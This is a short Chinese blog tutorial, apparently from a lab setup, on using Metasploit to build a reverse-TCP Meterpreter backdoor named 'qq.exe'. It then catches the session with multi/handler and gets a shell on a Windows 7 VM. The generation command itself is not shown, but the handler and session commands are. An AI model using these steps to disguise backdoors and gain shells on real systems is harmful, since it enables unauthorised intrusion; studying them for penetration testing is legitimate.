您的位置:首页 > 运维架构 > Shell

利用msf生成后门拿shell

2017-11-15 23:20 393 查看
[align=left]kali  x64:192.168.26.136
[/align]
[align=left]win7  x86: 192.168.26.128[/align]
[align=left][/align]

先在kali终端输入msfvenom -l,打开payload目录



然后找到payload windows/meterpreter/reverse_tcp

输入以下命令生成后门qq.exe



然后将生成的qq.exe移到win7中,然后打开msfconsole

使用该攻击模块监听 use exploit/multi/handler
 然后设置payload



show options 查看选项
设置LHOST为kali地址



然后run开始监听



这时我们打开win7的qq.exe文件
就能看到Kali这边获取到一个Session



输入jobs退出,继续输入sessions
-l查看session列表



这里有一个session列表,sessionid为1
我们输入sessions -i 1,与该session交互



输入getuid查看用户信息



输入systinfo获取系统信息



输入shell即可获取win7的shell



不过用这样方式拿的shell普遍都是很低的,还需提权
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  shell